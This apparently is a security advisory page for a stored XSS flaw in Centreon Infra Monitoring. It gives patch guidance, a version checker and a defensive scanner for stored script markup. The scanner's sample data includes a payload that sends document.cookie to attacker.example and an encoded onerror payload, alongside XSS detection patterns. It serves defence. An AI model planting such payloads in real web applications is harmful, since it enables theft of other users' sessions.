CVE-2025-54893

6.8 MEDIUM

📋 TL;DR

This stored XSS vulnerability in Centreon Infra Monitoring allows an authenticated user with elevated privileges to store script markup in host template configuration pages. The payload persists in the configuration and runs in the browser of every user who later views those pages, with that user's session, so a viewing administrator's session cookies can be stolen or actions performed in their name. Affected versions: 24.10.0 to 24.10.12, 24.04.0 to 24.04.17, and 23.10.0 to 23.10.27.

💻 Affected Systems

Products:
  • Centreon Infra Monitoring
Versions: 24.10.0 to 24.10.12, 24.04.0 to 24.04.17, 23.10.0 to 23.10.27
Operating Systems: Any OS running Centreon
Default Config Vulnerable: ⚠️ Yes
Notes: Injecting the payload requires an account with the privilege to edit host templates; any user who then views the affected pages, administrators included, can be a victim.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Privileged attacker steals administrator credentials, gains full system control, and compromises the entire monitoring infrastructure.

🟠

Likely Case

Malicious insider or compromised privileged account steals session cookies, escalates privileges, or performs unauthorized configuration changes.

🟢

If Mitigated

With the vendor fix applied, stored markup is rendered as inert text and there is no script execution; until then, restricting template editing to trusted administrators limits exposure to what those editors can already see and do.

🌐 Internet-Facing: MEDIUM - Requires authenticated privileged access, but internet-facing instances increase attack surface.
🏢 Internal Only: MEDIUM - Internal threat actors or compromised accounts can exploit this vulnerability.

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: MEDIUM

Requires authenticated privileged access and knowledge of XSS payloads.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 24.10.13, 24.04.18, 23.10.28

Vendor Advisory: https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54893-centreon-web-all-versions-medium-severity-5120

Restart Required: No

Instructions:

1. Back up your Centreon configuration.
2. Update to a patched version via the package manager or a manual installation.
3. Verify that the update completed successfully and that the reported version is a patched one.

🔧 Temporary Workarounds

Restrict Privileged Access

Applies to: all

Limit host template configuration permissions to the administrators who need them, and review which accounts currently hold that right.

Implement WAF Rules

Applies to: all

Deploy web application firewall rules that block script markup (such as <script, on*= event handlers, javascript: URIs) in host template parameters. Treat this as a stopgap only: WAF signatures are routinely bypassed with encoding and alternative markup, so this reduces but does not remove the risk.

🧯 If You Can't Patch

  • Input validation and output encoding for host template fields are the vendor's fix; what a deployer can do is audit existing host templates for stored markup (<script, on*= event handlers, javascript: URIs, including percent- or entity-encoded forms) and remove anything found. A payload already stored keeps executing for every viewer until it is removed or the page is patched.
  • Restrict template editing to trusted administrators (see above).
  • Add a Content-Security-Policy header at the web server or reverse proxy in front of Centreon to restrict where scripts may load from. Test it on a staging instance first: a policy that blocks inline scripts can break the UI, and a policy loose enough to allow them will not stop this XSS.

🔍 How to Verify

Check if Vulnerable:

Determine the installed Centreon version and compare it with the affected ranges above (24.10.0 to 24.10.12, 24.04.0 to 24.04.17, 23.10.0 to 23.10.27). Any version inside one of those ranges is vulnerable.

Check Version:

centreon -v on the server, or the About page of the web interface. The package manager's view of the centreon-web package (rpm -q centreon-web or dpkg -l centreon-web) gives the same information.

Verify Fix Applied:

Confirm the version is 24.10.13, 24.04.18 or 23.10.28 or later for its branch. Then, on a non-production instance, store a harmless marker such as <b>test</b> or <script>alert(1)</script> in a host template field and reload the page: a patched instance shows the markup as literal text instead of rendering it. Also review templates that existed before the patch for markup stored earlier.
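The version comparison above is easy to get wrong by hand (24.04.3 sorts after 24.10.2 as a string). The following script, an added example for this write-up and not Centreon's own tooling, encodes the affected and fixed versions stated on this page and classifies a version string taken from the About page or from package-manager output. Branches this page does not list (for example 25.x) are reported as "not-listed" rather than guessed at; check the vendor advisory for those.

```python
"""Classify a Centreon version against the affected ranges on this page.

Added example for this write-up, not Centreon's own tooling. The ranges and
fixed versions are the ones stated in the advisory above; branches that the
page does not list are reported as "not-listed" rather than guessed at.
"""
import re

# branch -> (first affected, last affected, first fixed), from the advisory.
AFFECTED_RANGES = {
    (24, 10): ((24, 10, 0), (24, 10, 12), (24, 10, 13)),
    (24, 4): ((24, 4, 0), (24, 4, 17), (24, 4, 18)),
    (23, 10): ((23, 10, 0), (23, 10, 27), (23, 10, 28)),
}

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """Pull the first X.Y.Z out of a string such as '24.04.3' or
    'centreon-web-24.10.5-1.el9.noarch' (rpm -q style output)."""
    m = _VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no X.Y.Z version found in {text!r}")
    return tuple(int(part) for part in m.groups())


def fmt(version):
    """Render (24, 4, 18) the way Centreon does: '24.04.18'."""
    major, minor, patch = version
    return f"{major}.{minor:02d}.{patch}"


def assess(text):
    """Return (status, first_fixed_version_or_None).

    status is 'vulnerable', 'patched' or 'not-listed'. Comparison is on
    integer tuples, so 24.04.3 < 24.04.17 is handled correctly.
    """
    version = parse_version(text)
    branch = version[:2]
    if branch not in AFFECTED_RANGES:
        return ("not-listed", None)
    first, last, fixed = AFFECTED_RANGES[branch]
    if first <= version <= last:
        return ("vulnerable", fmt(fixed))
    return ("patched", fmt(fixed))


if __name__ == "__main__":
    # Constructed sample inputs: About-page style and rpm -q style strings.
    for sample in ("24.10.12", "24.10.13",
                   "centreon-web-23.10.27-1.el9.noarch", "24.04.18", "25.04.1"):
        print(sample, "->", assess(sample))
```

Feed it the string from the About page or from `rpm -q centreon-web`; a result of "vulnerable" names the first version on that branch that carries the fix.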

📡 Detection & Monitoring

Log Indicators:

  • Unusual modifications to host templates
  • Suspicious characters in configuration parameters

Network Indicators:

  • Unexpected JavaScript in HTTP responses from host template pages

SIEM Query (illustrative; adapt the source and field names to your log pipeline, and note that a match on <script> alone misses event-handler and encoded payloads):

source="centreon" AND (event="template_modification" AND parameters CONTAINS "<script>")
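The log indicators above and the audit step under "If You Can't Patch" both come down to the same check: look at the values stored in host template fields and flag the ones carrying script markup, after undoing the encoding an attacker would use to slip past a naive `<script>` match. The script below is an added example for this write-up, not Centreon's code. The field names and sample values are constructed; real Centreon configuration lives in its database and exports, so the input source must be adapted. It also shows the output-side encoding that the vendor fix has to apply so stored markup is displayed rather than executed.

```python
"""Triage host-template field values for stored-XSS markers, and show the
output encoding that neutralises them.

Added example for this write-up, not Centreon's code. Field names and sample
values are constructed. Matching is a heuristic to surface templates for
review, not a blocking filter: event-handler matching can hit benign text
such as "online=" and should be reviewed by a person.
"""
import html
import re
import urllib.parse

# Each indicator is checked after one round of percent- and entity-decoding,
# so "%3Cscript%3E" and "&lt;script&gt;" are caught as well as "<script>".
INDICATORS = [
    ("script-tag", re.compile(r"<\s*script\b", re.I)),
    ("event-handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript-uri", re.compile(r"javascript\s*:", re.I)),
    ("active-element", re.compile(r"<\s*(img|svg|iframe|object|embed)\b", re.I)),
]


def normalise(value):
    """Undo one layer of percent encoding, then HTML entities."""
    return html.unescape(urllib.parse.unquote(value))


def find_indicators(value):
    """Names of every indicator that matches the decoded value."""
    text = normalise(value)
    return [name for name, pattern in INDICATORS if pattern.search(text)]


def scan_template(fields):
    """fields: {field_name: stored_value}. Returns [(field_name, [indicators])]
    for every field that trips at least one indicator."""
    findings = []
    for name, value in fields.items():
        hits = find_indicators(value)
        if hits:
            findings.append((name, hits))
    return findings


def render_safely(value):
    """The fix on the output side: encode for an HTML text context so stored
    markup is shown literally instead of being executed."""
    return html.escape(value, quote=True)


# Constructed sample: one benign field and two carrying payloads, the second
# percent-encoded the way it might arrive through a form submission.
SAMPLE_TEMPLATE = {
    "host_template_name": "generic-linux",
    "host_alias": "Linux server <script>document.location="
                  "'https://attacker.example/?c='+document.cookie</script>",
    "host_comment": "%3Cimg src=x onerror=alert(1)%3E",
}

if __name__ == "__main__":
    for field, hits in scan_template(SAMPLE_TEMPLATE):
        print(f"{field}: {', '.join(hits)}")
    print(render_safely(SAMPLE_TEMPLATE["host_alias"]))
```

Run it over an export of the host templates (or the parameters field of the modification events your SIEM query collects) and review every flagged field; the decoding step is what makes the difference between this and the bare `<script>` match in the query above.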
